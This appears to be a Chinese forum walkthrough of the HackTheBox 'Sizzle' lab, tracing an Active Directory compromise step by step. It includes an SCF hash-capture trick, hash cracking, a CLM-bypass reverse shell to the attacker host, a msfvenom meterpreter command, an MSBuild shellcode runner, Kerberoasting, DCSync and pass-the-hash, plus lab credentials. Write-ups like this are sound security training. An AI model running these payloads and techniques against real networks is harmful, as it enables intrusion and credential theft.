本帖最后由 zhaorong 于 2022-7-23 12:08 编辑

Sizzle是一个非常困难的靶机，知识点涉及smb匿名登陆、NTLM哈希获取NTLM哈希破解 LDAP信息获取
WinRM登陆、绕过powershell受限环境、Kerberoasting、DCSync等。
感兴趣的同学可以在HackTheBox中进行学习。


通关思维导图


0x01 侦查

端口探测

首先通过nmap对目标进行端口扫描。

nmap -Pn -p- -sV -sC -A 10.10.10.103 -oA nmap_Sizzle



扫描结果显示目标开放了21、80、443、445等端口。

80/443端口。

分别访问80和443端口，对应的都是同一张烤肉图片，猜测为同一站点。



对该站点进行目录扫描。

gobuster dir -u http://10.10.10.103 -w /usr/share/wordlists/dirb/big.txt -t 50


由于目录扫描常报错，最终整理后存在以下几个目录。

images
index.html
certenroll

访问/certenroll目录则界面显示403。

445端口

使用 smbmap 进行对 smb 服务进行扫描。

smbmap -H 10.10.10.103


使用 smbclient 探测默认共享，发现如下共享名称。

smbclient -N -L \\\\10.10.10.103


对其中各个共享名称进行访问，在共享SYSVOL中能够连接 smb 服务，遗憾的是无法执行命令 dir。

smbclient -N //10.10.10.103/SYSVOL


尝试收集扫描到的共享名称并循环扫描，而命令中的 sed 主要用于匹配正则表达式。

smbclient -N -L \\\\10.10.10.103 | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/'


通过正则匹配网站我们可以知道以上表达式匹配了什么。

网站地址：https://regex101.com/r/ageDvh/1。


查看正则匹配结果。

smbclient -N -L \\\\10.10.10.103 | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/' | while read share; do
echo "======${share}======"; smbclient -N "//10.10.10.103/${share}" -c dir; echo; done


结果显示只有Department Shares存在多个目录，其他共享名连接失败或无法查看。

将共享挂载到\mnt下便可以轻松访问。

mkdir mnt

mount -t cifs "//10.10.10.103/Department Shares" mnt


再次遍历后结果显示所有文件都是空值。

cat xxx | xxd

但是其中还存在一个Users目录，包含了多个用户名。


amanda  amanda_adm  bill  bob  chris  henry  joe  jose  lkys37en  morgan  mrb3n  Public
通古以下脚本进行遍历检查当前共享名下的写入权限。

find . -type d | while read directory; do
    touch ${directory}/0xdf 2>/dev/null && echo "${directory} - write file" && rm ${directory}/0xdf;
    mkdir ${directory}/0xdf 2>/dev/null && echo "${directory} - write dir" && rmdir ${directory}/0xdf;
done


存在两个目录拥有写入权限，进入/Users/Public并写入测试文件mac.txt。

cd Users/Public

touch mac.txt


成功写入文件，但过一会回去看它会自动消失。

watch -d "ls /mnt/Users/Public/*; ls /mnt/ZZ_ARCHIVE/*"

经过测试发现其中的文件每隔4分钟清除一次

0x02 上线[amanda]

现在我们知道该靶机中存在用户交互，通过 Windows 资源管理器（.scf）使用户访问该文件的目录时打开 SMB
连接比如在mac.scf中包含一个可以远程的图标路径。

可在目标主机上放置mac.scf，并通过程序响应来捕获NTLM v2的哈希值。

获取NTLM哈希值

首先创建 scf 文件并将其放到 Public 目录下。

cp mac.scf mnt/Users/Public

具体内容如下。

[Shell]
Command=2
IconFile=\\10.10.14.3\icon

使用 Responder 监听 tun0 网卡，成功收到响应报文。

responder -I tun0


amanda::HTB:e0d93f9ed39533f0:CC05038D74917172FF7DBBDF574D466F:010100000000000000115E
15D5E5D701671F0C8E2D9F87EC0000000002000800470032005400380001001E00570049004E002D00
4F005A005A0051005200550058004B004D004A00310004003400570049004E002D004F005A005A005
1005200550058004B004D004A0031002E0047003200540038002E004C004F00430041004C000300140
047003200540038002E004C004F00430041004C000500140047003200540038002E004C004F00430041
004C000700080000115E15D5E5D7010600040002000000080030003000000000000000010000000020
0000618685F222EA1F2B581F5A3E318D00997B3ED8A8504849C36733BA7C7E72A9AA0A0010000000
000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E0031
0034002E003300000000000000000000000000

哈希值破解

使用 hashcat 对其中的哈希值进行破解。

hashcat -m 5600 amanda.hash /usr/share/wordlists/rockyou.txt --force


成功破解密码为Ashare1972，使用该账号密码检查 smb 共享。

smbmap -H 10.10.10.103 -u amanda -p Ashare1972


登陆服务

smb登陆

使用 smbclient 连接目标 smb 共享 CertEnroll。

smbclient -U 'amanda%Ashare1972' //10.10.10.103/CertEnroll


其中存在许多证书，但是并没有发现可利用点。

LDAP信息获取。

使用 ldapdomaindump 通过收集活动目录信息。

ldapdomaindump -u 'htb.local\amanda' -p Ashare1972 10.10.10.103 -o ldap/


在其中获取到如下信息其中包含计算机信息、用户信息等。与此同时可知靶机处于域环境内
用户 sizzler 是域管理员。



在谷歌中搜索 certenroll 发现这是域认证服务，其中还包含目录certsrv。


访问站点目录http://10.10.10.103/certsrv出现跳出登录界面。


输入用户 amanda 的账号密码后成功登录。


那么为什么之前 gobuster 无法扫描到该目录呢？再次扫描进行查看。

gobuster dir -u http://10.10.10.103 -w /usr/share/wordlists/SecLists/Disco
very/Web-Content/IIS.fuzz.txt -t 20


这次直接使用 IIS 的 fuzz 字典扫描到了目标目录，说明之前的字典中未包含该目录。

WinRM登陆

登录后页面允许我生成一个证书，说明我可以冒充用户 amanda 的身份接下来我需要对应的证书和密钥来通过身份认证。

openssl 是个不错的选择。通过它可以生成密钥（key）和证书签名请求（csr）。

openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr


查看证书签名请求（csr）。

cat amanda.csr


切换至站点并在其中找到证书生成界面，选择高级证书请求。


粘贴之前的证书签名请求（csr）后点击提交。


成功生成并下载证书。


将证书移至本目录下并重命名为 amanda.cer。

mv ~/Downloads/certnew.cer amanda.cer

有了证书和密钥我们可以通过 WinRM 与 amanda 身份来进行身份验证对 Alamot 的 Ruby
脚本稍作修改如下。

原脚本地址：https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb。

Windows 远程管理 (WinRM) 是WS-Management Protocol的 Microsoft 实现，WS-Management Protocol是
一种基于标准简单对象访问协议 (SOAP) 的防火墙友好协议，允许来自不同供应商的硬件和操作系统进行互操作。
WS-Management 协议规范为系统提供了一种在 IT基础设施中访问和交换管理信息的通用方法WinRM 和智能
平台管理接口 (IPMI)以及事件收集器是Windows 硬件管理功能的组件。

#!/usr/bin/ruby
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: '/root/hackthebox/Machines/Sizzle/cert/amanda.cer',
  client_key: '/root/hackthebox/Machines/Sizzle/cert/amanda.key',
  :no_ssl_peer_verification => true
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end   
    puts "Exiting with code #{output.exitcode}"
end

在该脚本可以看到连接为SSL其中指定了证书和密钥来连接目标的5986端口连接后直接
返回 powershell 命令行。

ruby winrm_shell.rb


注意：如果报错，无法加载 winrm 包，可以执行以下命令来进行安装。

gem install winrm

gem install winrm-fs

0x03 权限提升[mrlky]

受限环境

执行命令可发现当前运行环境处于受限模式，同时 AppLocker 会限制运行内容。

$executioncontext.sessionstate.languagemode

Get-AppLockerPolicy -Effective -XML


绕过CLM

PSByPassCLM
使用 PSByPassCLM 可突破 CLM(Constrained Language Mode)，首先将其上传到
\users\amanda\appdata\local\temp\目录下。
工具下载地址：https://github.com/padovah4ck/PSByPassCLM。

在本地开启 http 服务。

python -m SimpleHTTPServer 80

在靶机中下载 PSByPassCLM.exe。

wget http://10.10.14.3/PsBypassCLM.exe -OutFile PsBypassCLM.exe


同时在本地开启监听服务。

rlwrap nc -nvlp 5555

在靶机上利用 PsBypassCLM 执行命令绕过CLM完成反弹shell

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToCo
nsole=true /U /revshell=true /rhost=10.10.14.3 /rport=5555 \users\amanda\appdata\lo
cal\temp\PsBypassCLM.exe


成功收到反弹shell。

MSF

也可以使用 MSF 来生成 shellcode 用于执行反弹shell。

msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp lhost=10.10.14.5 lport=445
-e x86/shikata_ga_nai -i 100 -f csharp > shellcode.txt


将下面 xml 文件中的 shellcode 替换成成功生成的 shellcode。

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
   
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {         
          private static UInt32 MEM_COMMIT = 0x1000;         
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;         
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);         
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );         
          public override bool Execute()
          {
            byte[] shellcode = new byte[195] {
              0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
              0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
              0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
              0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
              0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
              0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
              0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
              0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
              0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
              0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
              0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
              0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
           0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };
              
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          }
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

将其命名为 meterpreter.csproj 并上传。

iwr -uri http://10.10.14.3/meterpreter.csproj -outfile mac.csproj

在本地使用 msf 开启监听。

msconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 10.10.14.3
msf > set lport 445
msf > run

然后在靶机中通过 msbuild 运行。

copy mac.csproj c:\windows\system32\spool\drivers\color\
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe c:\windows\sy
stem32\spool\drivers\color\mac.csproj


但是未获得 msf 会话，猜测应该是没绕过 AV 限制。

Kerberoasting

在新的会话中查看端口开放情况。

netstat -ano


在其中发现了nmap扫描未发现的88端口，说明该端口可能已被防火墙屏蔽。而目前我们能够
访问到本地88端口因此可使用 Kerberoast，可通过以下几种方法来获取 Kerberoast。

Rubeus

借助 Rubeus 可获取 Kerberoast，该工具需要自己来编译 C# 文件来生成 exe。
下载地址：https://github.com/GhostPack/Rubeus。
将其上传至靶机的\users\amanda\appdata\local\temp\目录下。
wget http://10.10.14.3/Rubeus.exe -outfile Rubeus.exe

运行命令即可获取到对应的 NTML 哈希值

.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972

Chisel转发
使用 Chisel 这个工具能够帮助我们完成端口转发。
下载地址：https://github.com/jpillora/chisel。
首先在靶机中下载该程序，并通过它将本地88端口和389端口转发至本地8008端口。

wget http://10.10.14.3/chisel_1.7.6_windows_amd64.exe -outfile chisel.exe
cd c:\Windows\temp\
copy \users\amanda\appdata\local\temp\chisel.exe c:\windows\syst
em32\spool\drivers\color\chisel.exe
.\chisel.exe client 10.10.14.3:8008 R:88:127.0.0.1:88 R:389:localhost:389

在本地将 chisel 反弹的8008端口作为服务端用于访问目标的88端口和389端口。

./chisel server -p 8008 --reverse


使用 GetUserSPNs.py 能够获取 kerberoast。

python3 GetUserSPNs.py -request -dc-ip 127.0.0.1 htb.local/amanda -save -outp
utfile GetUserSPNs.out


需要注意的是如果要使 kerberos 工作，操作时间必须在五分钟之内，否则无法获取。

python3 GetUserSPNs.py -request -dc-ip 127.0.0.1 htb.local/amanda


NTLM哈希破解

为了破解 NTLM v2 哈希值，我们首先要将哈希值写入mrlky.ntlm当中。

$krb5tgs$23$*mrlky$HTB.LOCAL$htb.local/mrlky*$a0834969ff71ab60cdf6a4b2dc293533$34a0be7356e57394ebe0
597ef28adb9d9b1e3b05853909590f8bdfab9b3c18d75c92ee9ae63d7678851586ea7277cfc253a529c272976abc2f8d
07a05afff45b36415f2bc15aefc54a5fe9b0837a31adaba1a2117d9c3ee155c2dfed1f2df912eac9f1bc76d726914fed25c
5a15948bdc101de78b6bce338fadad10695a364ed5d4f70ee5aa4d1a7f1f5a5ad59118d19075071aa0b61c387677a4e
ca0ea59c1addae5f3c5bee3cffa58e510d89fba3f24e566773abd85198870ac8dc2a4f7f9a2bc5a39cc5b060149c71298
29bfddb51d5c80f5964e047bd375d69a8a42d0c562a59024f666d489ee281f3ec9b254e008e3c8e821d6f26654a7fec
ba109dbb4a7ae4e5da905d2e1d06b47591df0e15ef46ce11576ca206291f8ee4319daf8a7cf9f3c36eee10db84bde83
8c8e44991a2fe888087ca0778863592eaab06bd7d44972430ad0426e5a4127db08f8f642e8bd9b211336fc7447fd3f
ad88dc8d120501454c8149464aca470d47892e8196d81e3fa8f090142abea97ac037a27ae2e359cadbaab9ef0551d
6ac9bfd490a91af62ff5b11e5df756ad70a874f2037715aabb11d19561872a9867d859fecde373115d8f1bd7d72642
77a8621e08ef273d984c396342b68eebae52604828e5a6ec28cd8d772732122d216c46c0184b5bb6c60a9d6fa8fd1
0a5f4077abb78c927f59bcb833d037a2502809b11a23d5216bda03e8f29d4e5915a82cd8c96fe75cfa7c2b0562bfd7
7575ca02c170361efd9f1016b6457d365c6b1bab3edce635cf20a8c9edab1d9f9a4dde1d5c65a482fea3279805bb8
c99069209772b05872588bc5b245bab073015532966b1e78eb5b8913d84dce8a3188e7b5f2bbf2bd73db95238fb
3155e97fdf98c1cf4f43d28fa4ae8799f699a1eb4d9ec958cf3c5a1c72679f0c3a53e1d94bda3138251ca0d74bb806
1032b3ee78c27f8722863f83e2d59568739378ef646710b4d12c6d65d18dd8eef91e56aec74647c5fd378096a860
2f7647f36f6410529a4dd038842d6cc9434a71c76dc0c711d10198464bae92490cc3a3a0e74a88a1d6c3537b7252
974d2fdf627e0db9972390402a05c7169267fc2757e58d8d29e0345b8737eedb7cd16516790e89882c214504078
9d9690074cac529f8afa68ebe3b6a6509bf902a640c951b09acee2f03ba14d057326c25dd476c20d635f5fc53501c
b37fe27c01c30c1c581301ca121bab48cea7683499de297073ad650e9c0e70c89

使用 hashcat 进行破解。

hashcat -m 13100 -a 0 mrlky.ntlm /usr/share/wordlists/rockyou.txt --force


成功拿到密码为Football#7 。

WinRM登陆

使用 openssl 再次生成密钥（key）和证书签名请求（csr）。

openssl req -newkey rsa:2048 -nodes -keyout mrlky.key -out mrlky.csr


与之前一样登录 mrlky 账户，生成证书后将证书移至本目录下并重命名为 amanda.cer。

mv ~/Downloads/certnew.cer mrlky.cer

修改 WinRM 登陆脚本如下。

#!/usr/bin/ruby
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: '/root/hackthebox/Machines/Sizzle/cert/mrlky.cer',
  client_key: '/root/hackthebox/Machines/Sizzle/cert/mrlky.key',
  :no_ssl_peer_verification => true
)
command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end   
    puts "Exiting with code #{output.exitcode}"
end

执行后成功通过 WinRM 获得 mrlky 权限。


0x04 权限提升[administrator]

Bloodhound

使用 Bloodhound 可了解该主机中其他用户拥有何种权限。
下载地址：https://github.com/BloodHoundAD/BloodHound/releases/tag/4.0.3
通过 smb 服务上传 bloodhound，与此同时运行 smbserver 开启 smb 服务。
需要注意的是由于靶机中不允许连接未经身份认证的共享，所以我们需要设置账号密码来进行身份验证。

python3 smbserver.py -smb2support mac . -username mac -password mac

连接共享后将 Bloodhound 上传。

net use \\10.10.14.5\mac\ /u:mac mac

copy BloodHound.zip \\10.10.14.5\mac\

在本地查看 bloodhound 中的节点信息，其中显示它拥有 GetChangesALL 权限，这也就意味着我可以进行
dcsync 攻击，最终通过 secretsdump 来获取管理员的哈希值。

尝试哈希破解

意外C:\Windows\system32目录下存在file.txt，其中包含多个用户的哈希值。


在其中存在用户 mrlky 和管理员的哈希值。

mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::

使用 john 进行爆破。

john -format=NT --wordlist=/usr/share/wordlists/rockyou.txt mrlky.hash


成功拿到用户 mrlky 的密码为Football#7，但是没拿到管理员的密码。

DCSync

DCSync可从利用DRS(Directory Replication Service)协议通过IDL_DRSGetNCChanges
从域控制器复制用户凭据。

DCSync参考文章：https://yojimbosecurity.ninja/dcsync/

使用 secretsdump.py 成功获取管理员用户凭据。

python3 secretsdump.py sizzle.htb.local/mrlky:Football#7@sizzle.htb.local


使用 smbclient 登录管理员账户。

smbclient //sizzle.htb.local/C$ -U "administrator" --pw-nt-hash f6b7160bfc91823792e0ac3a162c9267

分别在用户 mrlky 和管理员桌面下下载两个flag。

cd \Users\mrlky\Desktop
get user.txt
cd \Users\Administrator\Desktop
get root.txt


通过 cat 命令成功获取两个flag。


管理员上线

使用 wmiexec.py 可成功获取管理员权限。

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792
e0ac3a162c9267 Administrator@10.10.10.103


总结：

在smb连接共享时发现对其中目录存在写入权限，上传scf文件获取NTLM哈希值，对哈希进行破解拿到账
号密码使用该账号密码登陆smb服务。
通过LDAP信息获取到站点目录，登陆后发现其中存在证书生成界面。通过openssl生成密钥和证书签名请求在网页中
使用证书签名请求生成证书，有了证书以后我们就可以使用WinRM登陆靶机，但是命令行运行环境为受限模式通过
PSByPassCLM绕过CLM拿到未受限的powershell环境。

借助 Chisel转发获取Kerberoast，之后将获取到NTLM哈希值进行破解同时拿到破解成功后的账号密码再次使用openssl
生成密钥和证书签名请求，登陆后使用证书签名请求生成证书，同样地再通过WinRM登陆另一用户完成首次权限提升。
在其中使用DCSync从域控制器复制用户凭据，具体可使用secretsdump获取管理员凭据
最终通过wmiexec获取到管理员权限。